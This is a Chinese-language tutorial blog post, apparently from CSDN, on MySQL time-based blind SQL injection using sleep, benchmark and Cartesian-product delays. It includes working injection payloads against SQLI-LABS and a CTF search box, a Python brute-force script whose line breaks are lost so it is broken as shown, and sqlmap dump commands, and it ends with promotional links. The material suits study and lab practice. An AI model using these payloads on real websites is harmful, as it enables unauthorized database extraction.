深入浅出带你学习时间盲注

引文

昨天给大家带来了布尔盲注的有关内容，今天给大家带来一个同样属于盲注的另一种注入方法——时间盲注，该方法与布尔盲注相似但又不是那么相似，下面由我带大家深入学习一下时间盲注。

基本知识

什么是时间盲注？

时间盲注又称延迟注入，适用于页面不会返回错误信息，只会回显一种界面(与布尔盲注类似)，其主要特征是利用sleep函数或者benchmark函数让mysql执行时间变长，制造时间延迟，由回显时间来判断是否报错。可以观察下面的例子：

我们构造了URL，如果if里的语句是正确的会返回1，如果语句是错误的就会延迟3秒，众所周知1!=2,所以网页反映了3秒，这就是一个简单的测试，可能有的朋友会问如何判断反应时间就是3秒呢，我们可以按F12打开开发者工具查看网页响应时间。

函数/方法

知道了时间盲注大致的应用方法我们就来看一下涉及的函数，众所周知时间盲注是与时间有关的所以涉及的函数也与时间有关。

sleep函数

sleep(X)函数，延迟X秒后回显，基于这个函数我们可以下面这样使用。

if（判断语句，x，y）如果判断语句正确则输出X，否则输出Y 

类似于布尔盲注，我们可以构造判断语句来进行判断。

?id=1' and if(length(database())>=8,sleep(5),1)-- - 

上面语句意思是如果数据库长度大于等于8我们就延时5秒后进行回显，与布尔盲注类似。

判断库名：

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+ 

得到库名为security后接着判断表名：

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+ 

之后判断列名：

?id=1’ and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit x,y),z,d))=105,sleep(2),1)–+ 

找到列名后就可以爆数据了。

benchmark函数

benchmark是Mysql的一个内置函数,其作用是来测试一些函数的执行速度，benchmark()中带有两个参数，第一个是执行的次数，第二个是要执行的函数或者是表达式。用法如下：

benchmark(count,expr) 

其中count指的是执行次数，expr表达式，合起来就是计算表达式count次，当我们有返回值时，就可以根据查询时间长短来达到延时的目的。

heavy query函数

原理是用到一些消耗资源的方式让数据库的查询时间尽量变长，而消耗数据库资源的最有效的方式就是让两个大表做笛卡尔积。

id = 1' and 1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.SCHEMATA C)%23
id = 1' and 0 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.SCHEMATA C)%23 

也是根据反应时间来进行判断，除了利用方法不太一样但思想都是差不多的。

注入过程

以SQLI-LABS的第九关为例，我们先判断注入点：

?id=1 and if(1,sleep(5),3) -- a
?id=1' and if(1,sleep(5),3) -- a
?id=1" and if(1,sleep(5),3) -- a 

接着判断长度：

?id=1' and if((length(查询语句) =1), sleep(5), 3) -- a 

一个一个的枚举字符：

?id=1' and if((ascii(substr(查询语句,1,1)) =1), sleep(5), 3) -- a 

以上就是简单的时间盲注过程，有没有发现一个一个时是不是很费时间，我们也是可以像布尔注入一样构造脚本。

例题

手工注入

进入页面是一个搜索框，尝试构造注入payload:

id=1 and if(mid(database(),1,1)=‘s’,sleep(5),1)–+ 

判断数据库长度：

1 and if(length(database())=4,sleep(3),1) 

判断为长度后，查数据库名字：

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	ascii(i)=105 

得到数据库名字为sqli,于是查看数据库下有几张表：

1 and if((select count(table_name) from information_schema.tables
 where table_schema=database())=2,sleep(3),1) 

判断为2个表，我们挨个猜表名：

1 and if(ascii(substr((select table_name from information_schema.tableswhere table_schema=database() limit 1,1),1,1))=102,sleep(3),1)ascii(f)=102 

得到表名为flag后猜字段名：

1 and if(ascii(substr((select column_name from information_schema.columns
 where table_name='flag'),1,1))=102,sleep(3),1) 

工作量是非常大的，于是我在网上找了一个脚本：

#encoding=utf-8
#时间盲注脚本
import requests
import time
import datetime
#获取数据库长度
def database_len():  #存放跑出的结果length=0database=''print ("start get length...")for l in range(1,15):startTime1=time.time()url1 = "?id=1 and if(length(database())=%d,sleep(1),1)"%(l)response1 = requests.get(url1)if time.time() - startTime1 > 1:length+=lprint ("the length :" , str(length)) # breakprint ("start database sql injection...")
database_len()
#获取数据库名
def database_name():name = ''for j in range(1, 15): #根据数据库名长度自行修改15这个数值for i in '0123456789abcdefghijklmnopqrstuvwxyz':url = '''http://172.20.10.14/pentest/test/time/'''payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (j, i)# print(url+payload+'%23')time1 = datetime.datetime.now()r = requests.get(url + payload + '%23')time2 = datetime.datetime.now()sec = (time2 - time1).secondsif sec >= 2:name += iprint(name)breakprint('database_name:', name)
database_name() 

SQLMAP注入

有时候我们可以使用SQLMAP去自动注入。

python sqlmap.py -u /?id=1 --dbs --batch 

得到数据库名，我们查询sqli库：

id=1 -D sqli --tables --batch 

之后查到表为flag字段为flag，我们直接查字段：

id=1 -D sqli -T flag -C flag --dump 

结语

g --dump

<img src="https://img-blog.csdnimg.cn/img_convert/16f644a38f9765951264e84f219d7f95.png" style="margin: auto" />

结语
==

今天详细讲了SQL注入里面的时间盲注，讲了几个常用的时间盲注的函数，有兴趣的小伙伴可以自己去靶场尝试一下，原理还是比较好懂的，错误的地方希望大家指正，如果对本文对你有帮助希望一键三连支持一下。## 网络安全工程师(白帽子)企业级学习路线

### 第一阶段：安全基础（入门）

![img](https://img-blog.csdnimg.cn/img_convert/52421912938f670ccb91e7daa36d643c.png)



### 第二阶段：Web渗透（初级网安工程师）

![img](https://img-blog.csdnimg.cn/img_convert/8c6c0c199adaae53057258e4dd1ca5b6.png)



### 第三阶段：进阶部分（中级网络安全工程师）

![img](https://img-blog.csdnimg.cn/img_convert/6b99413f11ff09902aad988b775ebd9d.png)

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里**👉**[网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！](https://mp.weixin.qq.com/s/BWb9OzaB-gVGVpkm161PMw)

## 学习资源分享

![外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?origin_url=C%3A%5CUsers%5CAdministrator%5CDesktop%5C%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%B5%84%E6%96%99%E5%9B%BE%5C%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20230201105953.png&pos_id=img-KKM9OQy6-1715474587125)

<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1678694737820.png?t=0.6334725112165747" />